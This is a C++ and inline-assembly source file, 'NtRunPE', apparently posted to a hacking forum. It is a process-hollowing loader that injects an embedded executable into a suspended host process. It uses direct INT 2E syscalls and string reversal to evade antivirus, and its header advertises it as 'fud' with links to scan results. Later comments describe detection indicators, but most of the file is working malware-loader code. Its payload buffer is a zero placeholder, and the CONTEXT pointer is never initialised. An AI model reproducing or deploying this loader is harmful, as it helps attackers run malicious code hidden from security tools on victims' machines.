- /*
- =========================== unCoder NtRunPE =============================
- Fully C0ded By : unCoder
- unCoderSc@gmail.com | unk0@hotmail.com
- skype : unk0:live
- [+] Coding Languages : C++ , Assembly
- [+] Gr3at'z Th4nks t0 : NativeCall - Simon-Benyo - ColdZer0 - V4zer
- [+] Great WebSites : undocumented.ntinternals.net - hackhound.org - dev-point.com
- # Scan Result :
- https://www.metascan-online.com/en/scanresult/file/38c4abdd6e204eb48f9742875c39c7b1
- http://vscan.novirusthanks.org/analysis/dc31c03fa7643bd31cf7a5e6c2de4a8e/bnRydW5wZS1leGU=/
- http://chk4me.com/check/public/68C28g_17WebNKXQn6iAV9RuJ13IZU_D
- What's New ?
- > working by native apis , With the last door in the usermode [ SYSENTER ( INT 2E ) ]
- > so it's fud & fast & super RUNPE :P
- [-] first share, so errors may occur; if you find any, fix them if you can or contact me.
- =========================== unCoder NtRunPE =============================
- */
- #include <Windows.h>
- #include <stdio.h>
- #include <iostream>
- #include "bytes.h"
- ///// Apis [ ntdll ] /////
// ntdll export names stored character-reversed; rev() restores them at the
// call site for apis[1..5]. apis[0] is never read through rev() — the
// NtGetContextThread call below passes the plain name instead. Reversal is a
// trivial transform: the plaintext names are recoverable from the compiled
// binary by anyone who reverses the strings, so it hides nothing from analysis.
char* apis[] = {
    "daerhTtxetnoCteGtN"      /*NtGetContextThread */,
    "noitceSfOweiVpamnUtN"    /*NtUnmapViewOfSection */,
    "yromeMlautriVetacollAtN" /*NtAllocateVirtualMemory */,
    "yromeMlautriVetirWtN"    /*NtWriteVirtualMemory */,
    "daerhTtxetnoCteStN"      /*NtSetContextThread */,
    "daerhTemuseRtN"          /*NtResumeThread */};
- ////////////////
// Copy the single byte at offset +1 of the ntdll export `proc` into a
// zero-initialised int and return it; returns 0 when ReadProcessMemory fails.
// The callers load the result into EAX before INT 2E, so the byte is
// presumably the low byte of the immediate in the stub's `mov eax, imm32`
// — i.e. the system-call number for this particular ntdll build (TODO confirm;
// the numbers change between Windows versions).
// Analyst note: a process that LoadLibrary's ntdll and reads its own export
// stubs via ReadProcessMemory is itself an observable behaviour.
int GetProcNtNumber(const char* proc)
{
    int number = NULL;
    if(ReadProcessMemory(GetCurrentProcess(),(LPVOID)((DWORD)(GetProcAddress(LoadLibraryA("ntdll"),proc))+1),&number,1,NULL))
        return number;
    return 0;
}
// Return a copy of `string` with its characters in reverse order.
// Used to restore the reversed ntdll export names in apis[].
std::string rev(std::string string)
{
    std::string reversed;
    reversed.reserve(string.size());
    for (auto it = string.rbegin(); it != string.rend(); ++it)
        reversed.push_back(*it);
    return reversed;
}
// Process-hollowing loader ("RunPE"), 32-bit only (INT 2E, DWORD ImageBase,
// CONTEXT.Eax): starts `victimPath` suspended, unmaps the host's image at the
// PE's preferred base, allocates RWX memory there, writes the PE held in
// `buffer` (headers, then each section), sets the suspended thread's EAX to
// the PE's entry point and resumes it.
// Every native call is issued as a raw INT 2E: EAX holds the call number from
// GetProcNtNumber(), the arguments are pushed last-parameter-first and EDX is
// pointed at ESP so they form the argument block. No ntdll import is touched,
// which is the "works under user-mode hooks" property the header advertises.
// Detection note: the sequence CREATE_SUSPENDED child -> unmap of its image ->
// RWX allocation at the image base -> remote writes -> SetContextThread ->
// ResumeThread is the canonical hollowing pattern, and it is visible to
// kernel-side telemetry irrespective of how the calls are made.
// Returns silently (no status) on a bad DOS/NT signature or CreateProcess failure.
void NtRunPE(LPBYTE buffer,LPCTSTR victimPath)
{
    int API_NUMBER = NULL;
    PIMAGE_DOS_HEADER PDH;
    PIMAGE_NT_HEADERS PNH;
    PIMAGE_SECTION_HEADER PSH;
    PDH = (PIMAGE_DOS_HEADER)&buffer[0];
    PNH = (PIMAGE_NT_HEADERS)&buffer[PDH->e_lfanew];
    if(PDH->e_magic != IMAGE_DOS_SIGNATURE)
        return;
    if(PNH->Signature != IMAGE_NT_SIGNATURE)
        return;
    PROCESS_INFORMATION PI;
    STARTUPINFO SI;
    ZeroMemory(&SI,sizeof(STARTUPINFO));
    SI.cb = sizeof(STARTUPINFO);
    // Host is started suspended so its primary thread can be redirected before it runs.
    if(!CreateProcessW(victimPath,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&SI,&PI))
        return;
    // NtGetContextThread <>
    API_NUMBER = GetProcNtNumber("NtGetContextThread"); // It's detected if it's reverse encryption :\
    CONTEXT *context;
    HANDLE hThread = PI.hThread;
    context->ContextFlags = CONTEXT_FULL;
    // NtGetContextThread(hThread, context): arguments pushed last-first,
    // EDX = ESP marks the argument block, EAX = call number.
    __asm
    {
        PUSH context
        PUSH hThread
        MOV EAX,API_NUMBER
        MOV EDX,ESP
        INT 0x2E
    }
    // Eax of the suspended thread is used as a success indicator here and is
    // overwritten with the new entry point before NtSetContextThread below.
    if(context->Eax == NULL)
        return;
    // NtGetContextThread <>
    // NtUnmapViewOfSection <>
    API_NUMBER = GetProcNtNumber(rev(apis[1]).c_str());
    HANDLE hProcess = PI.hProcess;
    DWORD imageBase = PNH->OptionalHeader.ImageBase;
    // NtUnmapViewOfSection(hProcess, imageBase): frees whatever the host had
    // mapped at the PE's preferred base.
    __asm
    {
        PUSH imageBase
        PUSH hProcess
        MOV EAX,API_NUMBER
        MOV EDX,ESP
        INT 0x2E
    }
    // NtUnmapViewOfSection <>
    // NtAllocateVirtualMemory <>
    API_NUMBER = GetProcNtNumber(rev(apis[2]).c_str());
    DWORD SizeOfImage = PNH->OptionalHeader.SizeOfImage;
    // NtAllocateVirtualMemory(hProcess, &base=imageBase, ZeroBits=0, &size,
    // MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE). Note the whole image is
    // allocated RWX — a strong indicator on its own.
    __asm
    {
        PUSH PAGE_EXECUTE_READWRITE
        PUSH MEM_COMMIT | MEM_RESERVE
        PUSH SizeOfImage
        PUSH NULL
        PUSH imageBase
        PUSH hProcess
        MOV EAX,API_NUMBER
        MOV EDX,ESP
        INT 0x2E
    }
    // NtAllocateVirtualMemory <>
    // NtWriteVirtualMemory <>
    API_NUMBER = GetProcNtNumber(rev(apis[3]).c_str());
    // 1 - Writing Headers
    // NtWriteVirtualMemory(hProcess, imageBase, buffer, SizeOfHeaders, NULL)
    DWORD HeadersSize = PNH->OptionalHeader.SizeOfHeaders;
    __asm
    {
        PUSH NULL
        PUSH HeadersSize
        PUSH buffer[0]
        PUSH imageBase
        PUSH hProcess
        MOV EAX,API_NUMBER
        MOV EDX,ESP
        INT 0x2E
    }
    // 2- Writing Sections
    DWORD PointerToRawData ;
    DWORD SizeOfRawData;
    LPVOID nextsection_adrr;
    // One write per section: raw bytes at PointerToRawData are copied to
    // ImageBase + VirtualAddress in the host.
    for (int i = 0 ; i < PNH->FileHeader.NumberOfSections ; i++)
    {
        PSH = (PIMAGE_SECTION_HEADER)&buffer[PDH->e_lfanew + sizeof(PIMAGE_NT_HEADERS) + sizeof(PIMAGE_SECTION_HEADER) * i];
        PointerToRawData = PSH->PointerToRawData;
        SizeOfRawData = PSH->SizeOfRawData;
        nextsection_adrr = (LPVOID)(PNH->OptionalHeader.ImageBase + PSH->VirtualAddress);
        __asm
        {
            PUSH NULL
            PUSH SizeOfRawData
            PUSH buffer[PointerToRawData]
            PUSH nextsection_adrr
            PUSH hProcess
            MOV EAX,API_NUMBER
            MOV EDX,ESP
            INT 0x2E
        }
    }
    // NtWriteVirtualMemory <>
    // NtSetContextThread <>
    API_NUMBER = GetProcNtNumber(rev(apis[4]).c_str());
    // calc the new entry [ imagebase + entrypoint address ]
    DWORD NewEax = PNH->OptionalHeader.ImageBase + PNH->OptionalHeader.AddressOfEntryPoint;
    // Only Eax is changed; a suspended primary thread resumes through the
    // loader stub that jumps to Eax, so this redirects execution to the new PE.
    context->Eax = NewEax;
    __asm
    {
        PUSH context
        PUSH hThread
        MOV EAX,API_NUMBER
        MOV EDX,ESP
        INT 0x2E
    }
    // NtSetContextThread <>
    // NtResumeThread <>
    API_NUMBER = GetProcNtNumber(rev(apis[5]).c_str());
    // NtResumeThread(hThread, PreviousSuspendCount=NULL)
    __asm
    {
        PUSH NULL
        PUSH hThread
        MOV EAX,API_NUMBER
        MOV EDX,ESP
        INT 0x2E
    }
    // NtResumeThread <>
}
// Entry point: runs the PE embedded in `buffer` (bytes.h) inside a suspended
// instance of the hard-coded host path. Always returns 0 — NtRunPE reports no status.
int main()
{
    NtRunPE(buffer,L"C:\\Test.exe");
    return 0;
}
//bytes.h
// Your File bytes
// Placeholder payload as shipped on this page: 120 zero bytes. As-is this
// fails the IMAGE_DOS_SIGNATURE check in NtRunPE and nothing is launched; the
// author expects the array to be replaced with the bytes of a real PE.
BYTE buffer[] = { 0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x00
};